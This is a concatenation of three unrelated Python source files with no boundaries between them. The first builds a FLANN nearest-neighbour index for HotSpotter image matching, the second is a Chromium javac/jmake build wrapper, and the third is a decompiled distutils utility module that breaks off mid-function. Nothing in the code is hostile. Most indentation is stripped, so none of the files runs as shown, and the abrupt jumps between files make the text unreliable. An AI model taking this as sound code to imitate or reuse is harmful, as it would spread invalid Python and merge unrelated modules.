#from itertools import chain
import sys
# Science
import numpy as np
# UTool
import utool
# VTool
from ibeis.other import ibsfuncs
import vtool.nearest_neighbors as nntool
(print, print_, printDBG, rrr, profile) = utool.inject(__name__, '[nnindex]', DEBUG=False)
NOCACHE_FLANN = '--nocache-flann' in sys.argv
def get_indexed_cfgstr(ibs, aid_list):
"""
Creates a config string for the input into the nearest neighbors index
It is based off of the features which were computed for it and the indexes
of the input annotations.
TODO: We should probably use the Annotation UUIDS rather than the ROWIDs
to compute this configstr
"""
feat_cfgstr = ibs.cfg.feat_cfg.get_cfgstr()
# returns something like: _daids((6)qbm6uaegu7gv!ut!)_FEAT(params)
daid_cfgstr = utool.hashstr_arr(aid_list, 'daids') # todo change to uuids
new_cfgstr = '_' + daid_cfgstr + feat_cfgstr
return new_cfgstr
def build_ibs_inverted_descriptor_index(ibs, aid_list):
"""
Aggregates descriptors of input annotations and returns inverted information
"""
try:
if len(aid_list) == 0:
msg = ('len(aid_list) == 0\n'
'Cannot build inverted index without features!')
raise AssertionError(msg)
desc_list = ibs.get_annot_desc(aid_list)
dx2_desc, dx2_aid, dx2_fx = _try_build_inverted_descriptor_index(aid_list, desc_list)
return dx2_desc, dx2_aid, dx2_fx
except Exception as ex:
        infostr = ibs.get_infostr()
        print(infostr)
utool.printex(ex, 'cannot build inverted index', key_list=list(locals().keys()))
raise
def _try_build_inverted_descriptor_index(aid_list, desc_list):
"""
Wrapper which performs logging and error checking
"""
if utool.NOT_QUIET:
print('[agg_desc] stacking descriptors from %d annotations' % len(aid_list))
try:
dx2_desc, dx2_aid, dx2_fx = _build_inverted_descriptor_index(aid_list, desc_list)
except MemoryError as ex:
utool.printex(ex, 'cannot build inverted index', '[!memerror]')
raise
if utool.NOT_QUIET:
print('[agg_desc] stacked %d descriptors from %d annotations'
% (len(dx2_desc), len(aid_list)))
return dx2_desc, dx2_aid, dx2_fx
def _build_inverted_descriptor_index(aid_list, desc_list):
"""
Stacks descriptors into a flat structure and returns inverse mapping from
flat database descriptor indexes (dx) to annotation ids (aid) and feature
indexes (fx). Feature indexes are w.r.t. annotation indexes.
Output:
dx2_desc - flat descriptor stack
dx2_aid - inverted index into annotations
dx2_fx - inverted index into features
# Example with 2D Descriptors
>>> from ibeis.model.hots.hots_nn_index import * # NOQA
>>> from ibeis.model.hots.hots_nn_index import _build_inverted_descriptor_index
>>> DESC_TYPE = np.uint8
>>> aid_list = [1, 2, 3, 4, 5]
>>> desc_list = [
... np.array([[0, 0], [0, 1]], dtype=DESC_TYPE),
... np.array([[5, 3], [2, 30], [1, 1]], dtype=DESC_TYPE),
... np.empty((0, 2), dtype=DESC_TYPE),
... np.array([[5, 3], [2, 30], [1, 1]], dtype=DESC_TYPE),
... np.array([[3, 3], [42, 42], [2, 6]], dtype=DESC_TYPE),
... ]
>>> dx2_desc, dx2_aid, dx2_fx = _build_inverted_descriptor_index(aid_list, desc_list)
>>> print(repr(dx2_desc.T))
array([[ 0, 0, 5, 2, 1, 5, 2, 1, 3, 42, 2],
[ 0, 1, 3, 30, 1, 3, 30, 1, 3, 42, 6]], dtype=uint8)
>>> print(repr(dx2_aid))
array([1, 1, 2, 2, 2, 4, 4, 4, 5, 5, 5])
>>> print(repr(dx2_fx))
array([0, 1, 0, 1, 2, 0, 1, 2, 0, 1, 2])
cdef:
list aid_list, desc_list
long nFeat, aid
iter aid_nFeat_iter, nFeat_iter, _ax2_aid, _ax2_fx
np.ndarray dx2_aid, dx2_fx, dx2_desc
"""
# Build inverted index of (aid, fx) pairs
aid_nFeat_iter = zip(aid_list, map(len, desc_list))
nFeat_iter = map(len, desc_list)
# generate aid inverted index for each feature in each annotation
_ax2_aid = ([aid] * nFeat for (aid, nFeat) in aid_nFeat_iter)
# Avi: please test the timing of the lines neighboring this statement.
#_ax2_aid = ([aid] * nFeat for (aid, nFeat) in aid_nFeat_iter)
# generate featx inverted index for each feature in each annotation
_ax2_fx = (range(nFeat) for nFeat in nFeat_iter)
# Flatten generators into the inverted index
#dx2_aid = np.array(list(chain.from_iterable(_ax2_aid)))
#dx2_fx = np.array(list(chain.from_iterable(_ax2_fx)))
dx2_aid = np.array(utool.flatten(_ax2_aid))
dx2_fx = np.array(utool.flatten(_ax2_fx))
    # Stack descriptors into a numpy array corresponding to the inverted index
# This might throw a MemoryError
dx2_desc = np.vstack(desc_list)
return dx2_desc, dx2_aid, dx2_fx
#@utool.indent_func('[build_invx]')
def build_flann_inverted_index(ibs, aid_list, **kwargs):
"""
Build a inverted index (using FLANN)
"""
# Aggregate descriptors
dx2_desc, dx2_aid, dx2_fx = build_ibs_inverted_descriptor_index(ibs, aid_list)
# hash which annotations are input
indexed_cfgstr = get_indexed_cfgstr(ibs, aid_list)
flann_params = {'algorithm': 'kdtree', 'trees': 4}
flann_cachedir = ibs.get_flann_cachedir()
precomp_kwargs = {'cache_dir': flann_cachedir,
'cfgstr': indexed_cfgstr,
'flann_params': flann_params,
'use_cache': kwargs.get('use_cache', not NOCACHE_FLANN)}
# Build/Load the flann index
flann = nntool.flann_cache(dx2_desc, **precomp_kwargs)
return dx2_desc, dx2_aid, dx2_fx, flann
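# Rough usage sketch (hypothetical ibs handle, annotation ids and query descriptors):
#   dx2_desc, dx2_aid, dx2_fx, flann = build_flann_inverted_index(ibs, [1, 2, 3])
#   qfx2_dx, qfx2_dist = flann.nn_index(qfx2_desc, 2, checks=1024)
#   qfx2_aid, qfx2_fx = dx2_aid[qfx2_dx], dx2_fx[qfx2_dx]
# i.e. the flat neighbor indexes are mapped back to annotation ids and feature
# indexes (see HOTSIndex.nn_index2 below).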
class HOTSIndex(object):
""" HotSpotter Nearest Neighbor (FLANN) Index Class
>>> from ibeis.model.hots.hots_nn_index import * # NOQA
>>> import ibeis
>>> ibs = ibeis.test_main(db='testdb1') #doctest: +ELLIPSIS
<BLANKLINE>
...
>>> daid_list = [1, 2, 3, 4]
>>> hsindex = HOTSIndex(ibs, daid_list) #doctest: +ELLIPSIS
[nnindex...
>>> print(hsindex) #doctest: +ELLIPSIS
<ibeis.model.hots.hots_nn_index.HOTSIndex object at ...>
"""
def __init__(hsindex, ibs, daid_list, **kwargs):
print('[nnindex] building HOTSIndex object')
dx2_desc, dx2_aid, dx2_fx, flann = build_flann_inverted_index(
ibs, daid_list, **kwargs)
# Agg Data
hsindex.dx2_aid = dx2_aid
hsindex.dx2_fx = dx2_fx
hsindex.dx2_data = dx2_desc
# Grab the keypoints names and image ids before query time
#hsindex.rx2_kpts = ibs.get_annot_kpts(daid_list)
#hsindex.rx2_gid = ibs.get_annot_gids(daid_list)
#hsindex.rx2_nid = ibs.get_annot_nids(daid_list)
hsindex.flann = flann
def __getstate__(hsindex):
""" This class it not pickleable """
#printDBG('get state HOTSIndex')
return None
#def __del__(hsindex):
# """ Ensure flann is propertly removed """
# printDBG('deleting HOTSIndex')
# if getattr(hsindex, 'flann', None) is not None:
# nn_selfindex.flann.delete_index()
# #del hsindex.flann
# hsindex.flann = None
def nn_index(hsindex, qfx2_desc, K, checks):
(qfx2_dx, qfx2_dist) = hsindex.flann.nn_index(qfx2_desc, K, checks=checks)
return (qfx2_dx, qfx2_dist)
def nn_index2(hsindex, qreq, qfx2_desc):
""" return nearest neighbors from this data_index's flann object """
flann = hsindex.flann
K = qreq.cfg.nn_cfg.K
Knorm = qreq.cfg.nn_cfg.Knorm
checks = qreq.cfg.nn_cfg.checks
(qfx2_dx, qfx2_dist) = flann.nn_index(qfx2_desc, K + Knorm, checks=checks)
qfx2_aid = hsindex.dx2_aid[qfx2_dx]
qfx2_fx = hsindex.dx2_fx[qfx2_dx]
return qfx2_aid, qfx2_fx, qfx2_dist, K, Knorm
class HOTSMultiIndex(object):
"""
Generalization of a HOTSNNIndex
>>> from ibeis.model.hots.hots_nn_index import * # NOQA
>>> import ibeis
>>> daid_list = [1, 2, 3, 4]
>>> num_forests = 8
>>> ibs = ibeis.test_main(db='testdb1') #doctest: +ELLIPSIS
<BLANKLINE>
...
>>> split_index = HOTSMultiIndex(ibs, daid_list, num_forests) #doctest: +ELLIPSIS
[nnsindex...
>>> print(split_index) #doctest: +ELLIPSIS
<ibeis.model.hots.hots_nn_index.HOTSMultiIndex object at ...>
"""
def __init__(split_index, ibs, daid_list, num_forests=8):
print('[nnsindex] make HOTSMultiIndex over %d annots' % (len(daid_list),))
# Remove unknown names
aid_list = daid_list
known_aids_list, unknown_aids = ibsfuncs.group_annots_by_known_names(ibs, aid_list)
num_bins = min(max(map(len, known_aids_list)), num_forests)
# Put one name per forest
forest_aids, overflow_aids = utool.sample_zip(
known_aids_list, num_bins, allow_overflow=True, per_bin=1)
forest_indexes = []
extra_indexes = []
for tx, aids in enumerate(forest_aids):
print('[nnsindex] building forest %d/%d with %d aids' %
(tx + 1, num_bins, len(aids)))
if len(aids) > 0:
hsindex = HOTSIndex(ibs, aids)
forest_indexes.append(hsindex)
if len(overflow_aids) > 0:
print('[nnsindex] building overflow forest')
overflow_index = HOTSIndex(ibs, overflow_aids)
extra_indexes.append(overflow_index)
if len(unknown_aids) > 0:
print('[nnsindex] building unknown forest')
unknown_index = HOTSIndex(ibs, unknown_aids)
extra_indexes.append(unknown_index)
#print('[nnsindex] building normalizer forest') # TODO
split_index.forest_indexes = forest_indexes
split_index.extra_indexes = extra_indexes
#split_index.overflow_index = overflow_index
#split_index.unknown_index = unknown_index
#@utool.classmember(HOTSMultiIndex)
def nn_index(split_index, qfx2_desc, num_neighbors):
qfx2_dx_list = []
qfx2_dist_list = []
qfx2_aid_list = []
qfx2_fx_list = []
qfx2_rankx_list = [] # ranks index
qfx2_treex_list = [] # tree index
for tx, hsindex in enumerate(split_index.forest_indexes):
flann = hsindex.flann
# Returns distances in ascending order for each query descriptor
(qfx2_dx, qfx2_dist) = flann.nn_index(qfx2_desc, num_neighbors, checks=1024)
qfx2_dx_list.append(qfx2_dx)
qfx2_dist_list.append(qfx2_dist)
qfx2_fx = hsindex.dx2_fx[qfx2_dx]
qfx2_aid = hsindex.dx2_aid[qfx2_dx]
qfx2_fx_list.append(qfx2_fx)
qfx2_aid_list.append(qfx2_aid)
qfx2_rankx_list.append(np.array([[rankx for rankx in range(qfx2_dx.shape[1])]] * len(qfx2_dx)))
qfx2_treex_list.append(np.array([[tx for rankx in range(qfx2_dx.shape[1])]] * len(qfx2_dx)))
# Combine results from each tree
(qfx2_dist_, qfx2_aid_, qfx2_fx_, qfx2_dx_, qfx2_rankx_, qfx2_treex_,) = \
        join_split_nn(qfx2_dx_list, qfx2_dist_list, qfx2_aid_list, qfx2_fx_list,
                      qfx2_rankx_list, qfx2_treex_list)
def join_split_nn(qfx2_dx_list, qfx2_dist_list, qfx2_aid_list, qfx2_fx_list, qfx2_rankx_list, qfx2_treex_list):
qfx2_dx = np.hstack(qfx2_dx_list)
qfx2_dist = np.hstack(qfx2_dist_list)
qfx2_rankx = np.hstack(qfx2_rankx_list)
qfx2_treex = np.hstack(qfx2_treex_list)
qfx2_aid = np.hstack(qfx2_aid_list)
qfx2_fx = np.hstack(qfx2_fx_list)
# Sort over all tree result distances
qfx2_sortx = qfx2_dist.argsort(axis=1)
# Apply sorting to concatenated results
qfx2_dist_ = [row[sortx] for sortx, row in zip(qfx2_sortx, qfx2_dist)]
    qfx2_aid_ = [row[sortx] for sortx, row in zip(qfx2_sortx, qfx2_aid)]
    qfx2_fx_ = [row[sortx] for sortx, row in zip(qfx2_sortx, qfx2_fx)]
    qfx2_dx_ = [row[sortx] for sortx, row in zip(qfx2_sortx, qfx2_dx)]
qfx2_rankx_ = [row[sortx] for sortx, row in zip(qfx2_sortx, qfx2_rankx)]
qfx2_treex_ = [row[sortx] for sortx, row in zip(qfx2_sortx, qfx2_treex)]
return (qfx2_dist_, qfx2_aid_, qfx2_fx_, qfx2_dx_, qfx2_rankx_, qfx2_treex_,)
#@utool.classmember(HOTSMultiIndex)
def split_index_daids(split_index):
for hsindex in split_index.forest_indexes:
pass
#if __name__ == '__main__':
# #python -m doctest -v ibeis/model/hots/hots_nn_index.py
# import doctest
# doctest.testmod()
#!/usr/bin/env python
#
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import optparse
import os
import shutil
import re
import sys
import textwrap
from util import build_utils
from util import md5_check
import jar
sys.path.append(build_utils.COLORAMA_ROOT)
import colorama
def ColorJavacOutput(output):
fileline_prefix = r'(?P<fileline>(?P<file>[-.\w/\\]+.java):(?P<line>[0-9]+):)'
warning_re = re.compile(
fileline_prefix + r'(?P<full_message> warning: (?P<message>.*))$')
error_re = re.compile(
fileline_prefix + r'(?P<full_message> (?P<message>.*))$')
marker_re = re.compile(r'\s*(?P<marker>\^)\s*$')
warning_color = ['full_message', colorama.Fore.YELLOW + colorama.Style.DIM]
error_color = ['full_message', colorama.Fore.MAGENTA + colorama.Style.BRIGHT]
marker_color = ['marker', colorama.Fore.BLUE + colorama.Style.BRIGHT]
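  # For example, a javac line such as
  #   'Foo.java:42: warning: [deprecation] frob() is deprecated'
  # matches warning_re, and only its 'full_message' group is colorized.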
def Colorize(line, regex, color):
match = regex.match(line)
start = match.start(color[0])
end = match.end(color[0])
return (line[:start]
+ color[1] + line[start:end]
+ colorama.Fore.RESET + colorama.Style.RESET_ALL
+ line[end:])
def ApplyColor(line):
if warning_re.match(line):
line = Colorize(line, warning_re, warning_color)
elif error_re.match(line):
line = Colorize(line, error_re, error_color)
elif marker_re.match(line):
line = Colorize(line, marker_re, marker_color)
return line
return '\n'.join(map(ApplyColor, output.split('\n')))
ERRORPRONE_OPTIONS = [
# These crash on lots of targets.
'-Xep:ParameterPackage:OFF',
'-Xep:OverridesGuiceInjectableMethod:OFF',
'-Xep:OverridesJavaxInjectableMethod:OFF',
]
def _FilterJavaFiles(paths, filters):
return [f for f in paths
if not filters or build_utils.MatchesGlob(f, filters)]
_MAX_MANIFEST_LINE_LEN = 72
def _ExtractClassFiles(jar_path, dest_dir, java_files):
"""Extracts all .class files not corresponding to |java_files|."""
# Two challenges exist here:
  # 1. |java_files| have prefixes that are not represented in the jar paths.
# 2. A single .java file results in multiple .class files when it contains
# nested classes.
# Here's an example:
# source path: ../../base/android/java/src/org/chromium/Foo.java
# jar paths: org/chromium/Foo.class, org/chromium/Foo$Inner.class
# To extract only .class files not related to the given .java files, we strip
# off ".class" and "$*.class" and use a substring match against java_files.
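  # Rough trace with the example above: both 'org/chromium/Foo.class' and
  # 'org/chromium/Foo$Inner.class' map back to 'org/chromium/Foo.java', which is
  # in |java_files|, so neither is extracted; a .class file whose derived .java
  # path matches none of |java_files| is extracted.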
def extract_predicate(path):
if not path.endswith('.class'):
return False
    path_without_suffix = re.sub(r'(?:\$|\.)[^/]*class$', '', path)
partial_java_path = path_without_suffix + '.java'
return not any(p.endswith(partial_java_path) for p in java_files)
build_utils.ExtractAll(jar_path, path=dest_dir, predicate=extract_predicate)
for path in build_utils.FindInDirectory(dest_dir, '*.class'):
shutil.copystat(jar_path, path)
def _ConvertToJMakeArgs(javac_cmd, pdb_path):
new_args = ['bin/jmake', '-pdb', pdb_path]
if javac_cmd[0] != 'javac':
    new_args.extend(('-jcexec', javac_cmd[0]))
if md5_check.PRINT_EXPLANATIONS:
new_args.append('-Xtiming')
do_not_prefix = ('-classpath', '-bootclasspath')
skip_next = False
for arg in javac_cmd[1:]:
if not skip_next and arg not in do_not_prefix:
arg = '-C' + arg
new_args.append(arg)
skip_next = arg in do_not_prefix
return new_args
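# For example (illustrative values only), a command such as
#   ['javac', '-encoding', 'UTF-8', '-classpath', 'a.jar:b.jar', '-d', 'out']
# becomes roughly
#   ['bin/jmake', '-pdb', pdb_path, '-C-encoding', '-CUTF-8',
#    '-classpath', 'a.jar:b.jar', '-C-d', '-Cout']
# i.e. regular javac flags are prefixed with '-C' (passed through to the
# compiler) while '-classpath'/'-bootclasspath' and their values are left
# unprefixed for jmake itself.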
def _FixTempPathsInIncrementalMetadata(pdb_path, temp_dir):
# The .pdb records absolute paths. Fix up paths within /tmp (srcjars).
if os.path.exists(pdb_path):
    # Although it's a binary file, search/replace still seems to work fine.
with open(pdb_path) as fileobj:
pdb_data = fileobj.read()
with open(pdb_path, 'w') as fileobj:
fileobj.write(re.sub(r'/tmp/[^/]*', temp_dir, pdb_data))
def _OnStaleMd5(changes, options, javac_cmd, java_files, classpath_inputs):
with build_utils.TempDir() as temp_dir:
srcjars = options.java_srcjars
# The .excluded.jar contains .class files excluded from the main jar.
# It is used for incremental compiles.
excluded_jar_path = options.jar_path.replace('.jar', '.excluded.jar')
classes_dir = os.path.join(temp_dir, 'classes')
os.makedirs(classes_dir)
changed_paths = None
# jmake can handle deleted files, but it's a rare case and it would
# complicate this script's logic.
if options.incremental and changes.AddedOrModifiedOnly():
changed_paths = set(changes.IterChangedPaths())
# Do a full compile if classpath has changed.
# jmake doesn't seem to do this on its own... Might be that ijars mess up
# its change-detection logic.
if any(p in changed_paths for p in classpath_inputs):
changed_paths = None
if options.incremental:
# jmake is a compiler wrapper that figures out the minimal set of .java
# files that need to be rebuilt given a set of .java files that have
# changed.
# jmake determines what files are stale based on timestamps between .java
# and .class files. Since we use .jars, .srcjars, and md5 checks,
# timestamp info isn't accurate for this purpose. Rather than use jmake's
      # programmatic interface (like we eventually should), we ensure that all
# .class files are newer than their .java files, and convey to jmake which
# sources are stale by having their .class files be missing entirely
# (by not extracting them).
pdb_path = options.jar_path + '.pdb'
javac_cmd = _ConvertToJMakeArgs(javac_cmd, pdb_path)
if srcjars:
_FixTempPathsInIncrementalMetadata(pdb_path, temp_dir)
if srcjars:
java_dir = os.path.join(temp_dir, 'java')
os.makedirs(java_dir)
for srcjar in options.java_srcjars:
if changed_paths:
changed_paths.update(os.path.join(java_dir, f)
for f in changes.IterChangedSubpaths(srcjar))
build_utils.ExtractAll(srcjar, path=java_dir, pattern='*.java')
jar_srcs = build_utils.FindInDirectory(java_dir, '*.java')
jar_srcs = _FilterJavaFiles(jar_srcs, options.javac_includes)
java_files.extend(jar_srcs)
if changed_paths:
        # Set the mtime of all sources to 0 since we use the absence of .class
# files to tell jmake which files are stale.
for path in jar_srcs:
os.utime(path, (0, 0))
if java_files:
if changed_paths:
changed_java_files = [p for p in java_files if p in changed_paths]
if os.path.exists(options.jar_path):
_ExtractClassFiles(options.jar_path, classes_dir, changed_java_files)
if os.path.exists(excluded_jar_path):
_ExtractClassFiles(excluded_jar_path, classes_dir, changed_java_files)
# Add the extracted files to the classpath. This is required because
# when compiling only a subset of files, classes that haven't changed
# need to be findable.
classpath_idx = javac_cmd.index('-classpath')
javac_cmd[classpath_idx + 1] += ':' + classes_dir
# Can happen when a target goes from having no sources, to having sources.
# It's created by the call to build_utils.Touch() below.
if options.incremental:
if os.path.exists(pdb_path) and not os.path.getsize(pdb_path):
os.unlink(pdb_path)
# Don't include the output directory in the initial set of args since it
# being in a temp dir makes it unstable (breaks md5 stamping).
cmd = javac_cmd + ['-d', classes_dir] + java_files
# JMake prints out some diagnostic logs that we want to ignore.
# This assumes that all compiler output goes through stderr.
stdout_filter = lambda s: ''
if md5_check.PRINT_EXPLANATIONS:
stdout_filter = None
attempt_build = lambda: build_utils.CheckOutput(
cmd,
print_stdout=options.chromium_code,
stdout_filter=stdout_filter,
stderr_filter=ColorJavacOutput)
try:
attempt_build()
except build_utils.CalledProcessError as e:
# Work-around for a bug in jmake (http://crbug.com/551449).
if 'project database corrupted' not in e.output:
raise
print ('Applying work-around for jmake project database corrupted '
'(http://crbug.com/551449).')
os.unlink(pdb_path)
attempt_build()
elif options.incremental:
# Make sure output exists.
build_utils.Touch(pdb_path)
glob = options.jar_excluded_classes
inclusion_predicate = lambda f: not build_utils.MatchesGlob(f, glob)
exclusion_predicate = lambda f: not inclusion_predicate(f)
jar.JarDirectory(classes_dir,
options.jar_path,
predicate=inclusion_predicate)
jar.JarDirectory(classes_dir,
excluded_jar_path,
predicate=exclusion_predicate)
def _ParseOptions(argv):
parser = optparse.OptionParser()
build_utils.AddDepfileOption(parser)
parser.add_option(
'--src-gendirs',
help='Directories containing generated java files.')
parser.add_option(
'--java-srcjars',
action='append',
default=[],
help='List of srcjars to include in compilation.')
parser.add_option(
'--bootclasspath',
action='append',
default=[],
help='Boot classpath for javac. If this is specified multiple times, '
'they will all be appended to construct the classpath.')
parser.add_option(
'--classpath',
action='append',
help='Classpath for javac. If this is specified multiple times, they '
'will all be appended to construct the classpath.')
parser.add_option(
'--incremental',
action='store_true',
help='Whether to re-use .class files rather than recompiling them '
'(when possible).')
parser.add_option(
'--javac-includes',
default='',
      help='A list of file patterns. If provided, only java files that match '
           'one of the patterns will be compiled.')
parser.add_option(
'--jar-excluded-classes',
default='',
help='List of .class file patterns to exclude from the jar.')
parser.add_option(
'--chromium-code',
type='int',
help='Whether code being compiled should be built with stricter '
'warnings for chromium code.')
parser.add_option(
'--use-errorprone-path',
help='Use the Errorprone compiler at this path.')
parser.add_option('--jar-path', help='Jar output path.')
parser.add_option('--stamp', help='Path to touch on success.')
options, args = parser.parse_args(argv)
build_utils.CheckOptions(options, parser, required=('jar_path',))
bootclasspath = []
for arg in options.bootclasspath:
bootclasspath += build_utils.ParseGypList(arg)
options.bootclasspath = bootclasspath
classpath = []
for arg in options.classpath:
classpath += build_utils.ParseGypList(arg)
options.classpath = classpath
java_srcjars = []
for arg in options.java_srcjars:
java_srcjars += build_utils.ParseGypList(arg)
options.java_srcjars = java_srcjars
if options.src_gendirs:
options.src_gendirs = build_utils.ParseGypList(options.src_gendirs)
options.javac_includes = build_utils.ParseGypList(options.javac_includes)
options.jar_excluded_classes = (
build_utils.ParseGypList(options.jar_excluded_classes))
return options, args
def main(argv):
colorama.init()
argv = build_utils.ExpandFileArgs(argv)
options, java_files = _ParseOptions(argv)
if options.src_gendirs:
java_files += build_utils.FindInDirectories(options.src_gendirs, '*.java')
java_files = _FilterJavaFiles(java_files, options.javac_includes)
javac_cmd = ['javac']
if options.use_errorprone_path:
javac_cmd = [options.use_errorprone_path] + ERRORPRONE_OPTIONS
javac_cmd.extend((
'-g',
# Chromium only allows UTF8 source files. Being explicit avoids
# javac pulling a default encoding from the user's environment.
'-encoding', 'UTF-8',
'-classpath', ':'.join(options.classpath),
# Prevent compiler from compiling .java files not listed as inputs.
# See: http://blog.ltgt.net/most-build-tools-misuse-javac/
'-sourcepath', ''
))
if options.bootclasspath:
javac_cmd.extend([
'-bootclasspath', ':'.join(options.bootclasspath),
'-source', '1.7',
'-target', '1.7',
])
if options.chromium_code:
javac_cmd.extend(['-Xlint:unchecked', '-Xlint:deprecation'])
else:
# XDignore.symbol.file makes javac compile against rt.jar instead of
# ct.sym. This means that using a java internal package/class will not
# trigger a compile warning or error.
javac_cmd.extend(['-XDignore.symbol.file'])
classpath_inputs = options.bootclasspath
# TODO(agrieve): Remove this .TOC heuristic once GYP is no more.
if options.classpath and not options.classpath[0].endswith('.interface.jar'):
for path in options.classpath:
if os.path.exists(path + '.TOC'):
classpath_inputs.append(path + '.TOC')
else:
classpath_inputs.append(path)
# Compute the list of paths that when changed, we need to rebuild.
input_paths = classpath_inputs + options.java_srcjars + java_files
output_paths = [
options.jar_path,
options.jar_path.replace('.jar', '.excluded.jar'),
]
if options.incremental:
output_paths.append(options.jar_path + '.pdb')
# An escape hatch to be able to check if incremental compiles are causing
# problems.
force = int(os.environ.get('DISABLE_INCREMENTAL_JAVAC', 0))
  # List python deps in input_strings rather than input_paths since their
  # contents do not change what gets written to the depsfile.
build_utils.CallAndWriteDepfileIfStale(
lambda changes: _OnStaleMd5(changes, options, javac_cmd, java_files,
classpath_inputs),
options,
input_paths=input_paths,
input_strings=javac_cmd,
output_paths=output_paths,
force=force,
pass_changes=True)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: util.py
"""distutils.util
Miscellaneous utility functions -- anything that doesn't fit into
one of the other *util.py modules.
"""
__revision__ = '$Id$'
import sys
import os
import string
import re
from distutils.errors import DistutilsPlatformError
from distutils.dep_util import newer
from distutils.spawn import spawn
from distutils import log
from distutils.errors import DistutilsByteCompileError
def get_platform():
"""Return a string that identifies the current platform. This is used
mainly to distinguish platform-specific build directories and
platform-specific built distributions. Typically includes the OS name
and version and the architecture (as supplied by 'os.uname()'),
although the exact information included depends on the OS; eg. for IRIX
the architecture isn't particularly important (IRIX only runs on SGI
hardware), but for Linux the kernel version isn't particularly
important.
Examples of returned values:
linux-i586
linux-alpha (?)
solaris-2.6-sun4u
irix-5.3
irix64-6.2
Windows will return one of:
win-amd64 (64bit Windows on AMD64 (aka x86_64, Intel64, EM64T, etc)
win-ia64 (64bit Windows on Itanium)
win32 (all others - specifically, sys.platform is returned)
For other non-POSIX platforms, currently just returns 'sys.platform'.
"""
if os.name == 'nt':
prefix = ' bit ('
i = string.find(sys.version, prefix)
if i == -1:
return sys.platform
j = string.find(sys.version, ')', i)
look = sys.version[i + len(prefix):j].lower()
if look == 'amd64':
return 'win-amd64'
if look == 'itanium':
return 'win-ia64'
return sys.platform
else:
if os.name != 'posix' or not hasattr(os, 'uname'):
return sys.platform
osname, host, release, version, machine = os.uname()
osname = string.lower(osname)
osname = string.replace(osname, '/', '')
machine = string.replace(machine, ' ', '_')
machine = string.replace(machine, '/', '-')
if osname[:5] == 'linux':
return '%s-%s' % (osname, machine)
if osname[:5] == 'sunos':
if release[0] >= '5':
osname = 'solaris'
release = '%d.%s' % (int(release[0]) - 3, release[2:])
else:
if osname[:4] == 'irix':
return '%s-%s' % (osname, release)
if osname[:3] == 'aix':
return '%s-%s.%s' % (osname, version, release)
if osname[:6] == 'cygwin':
osname = 'cygwin'
rel_re = re.compile('[\\d.]+')
m = rel_re.match(release)
if m:
release = m.group()
elif osname[:6] == 'darwin':
from distutils.sysconfig import get_config_vars
cfgvars = get_config_vars()
macver = cfgvars.get('MACOSX_DEPLOYMENT_TARGET')
macrelease = macver
try:
f = open('/System/Library/CoreServices/SystemVersion.plist')
except IOError:
pass
else:
try:
m = re.search('<key>ProductUserVisibleVersion</key>\\s*' + '<string>(.*?)</string>', f.read())
if m is not None:
macrelease = '.'.join(m.group(1).split('.')[:2])
finally:
f.close()
if not macver:
macver = macrelease
if macver:
from distutils.sysconfig import get_config_vars
release = macver
osname = 'macosx'
if macrelease + '.' >= '10.4.' and '-arch' in get_config_vars().get('CFLAGS', '').strip():
machine = 'fat'
cflags = get_config_vars().get('CFLAGS')
archs = re.findall('-arch\\s+(\\S+)', cflags)
archs = tuple(sorted(set(archs)))
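                # Illustration (added comment): CFLAGS containing
                # "-arch i386 -arch x86_64" gives archs == ('i386', 'x86_64'),
                # which the chain below maps to machine = 'intel'.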
if len(archs) == 1:
machine = archs[0]
elif archs == ('i386', 'ppc'):
machine = 'fat'
elif archs == ('i386', 'x86_64'):
machine = 'intel'
elif archs == ('i386', 'ppc', 'x86_64'):
machine = 'fat3'
elif archs == ('ppc64', 'x86_64'):
machine = 'fat64'
elif archs == ('i386', 'ppc', 'ppc64', 'x86_64'):
machine = 'universal'
else:
raise ValueError("Don't know machine value for archs=%r" % (archs,))
elif machine == 'i386':
if sys.maxint >= 4294967296:
machine = 'x86_64'
elif machine in ('PowerPC', 'Power_Macintosh'):
machine = 'ppc'
if sys.maxint >= 4294967296:
machine = 'ppc64'
return '%s-%s-%s' % (osname, release, machine)
def convert_path(pathname):
"""Return 'pathname' as a name that will work on the native filesystem,
i.e. split it on '/' and put it back together again using the current
directory separator. Needed because filenames in the setup script are
always supplied in Unix style, and have to be converted to the local
convention before we can actually use them in the filesystem. Raises
ValueError on non-Unix-ish systems if 'pathname' either starts or
ends with a slash.
"""
if os.sep == '/':
return pathname
if not pathname:
return pathname
if pathname[0] == '/':
raise ValueError, "path '%s' cannot be absolute" % pathname
if pathname[-1] == '/':
raise ValueError, "path '%s' cannot end with '/'" % pathname
paths = string.split(pathname, '/')
while '.' in paths:
paths.remove('.')
if not paths:
return os.curdir
return os.path.join(*paths)
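# Illustration (added, not part of the original module): on POSIX (os.sep ==
# '/') the path is returned unchanged; on a platform where os.sep is '\\' the
# rules above give, for example,
#     convert_path('foo/bar/baz.txt')  ->  'foo\\bar\\baz.txt'
#     convert_path('./a/b')            ->  'a\\b'   ('.' components dropped)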
def change_root(new_root, pathname):
"""Return 'pathname' with 'new_root' prepended. If 'pathname' is
relative, this is equivalent to "os.path.join(new_root,pathname)".
Otherwise, it requires making 'pathname' relative and then joining the
two, which is tricky on DOS/Windows and Mac OS.
"""
if os.name == 'posix':
if not os.path.isabs(pathname):
return os.path.join(new_root, pathname)
else:
return os.path.join(new_root, pathname[1:])
else:
if os.name == 'nt':
drive, path = os.path.splitdrive(pathname)
if path[0] == '\\':
path = path[1:]
return os.path.join(new_root, path)
if os.name == 'os2':
drive, path = os.path.splitdrive(pathname)
if path[0] == os.sep:
path = path[1:]
return os.path.join(new_root, path)
raise DistutilsPlatformError, "nothing known about platform '%s'" % os.name
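# Illustration (added): on POSIX,
#     change_root('/usr/local', 'bin/prog')   ->  '/usr/local/bin/prog'
#     change_root('/usr/local', '/bin/prog')  ->  '/usr/local/bin/prog'
# i.e. an absolute 'pathname' has its leading '/' stripped before joining.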
_environ_checked = 0
def check_environ():
"""Ensure that 'os.environ' has all the environment variables we
guarantee that users can use in config files, command-line options,
etc. Currently this includes:
HOME - user's home directory (Unix only)
PLAT - description of the current platform, including hardware
and OS (see 'get_platform()')
"""
global _environ_checked
if _environ_checked:
return
if os.name == 'posix' and 'HOME' not in os.environ:
import pwd
os.environ['HOME'] = pwd.getpwuid(os.getuid())[5]
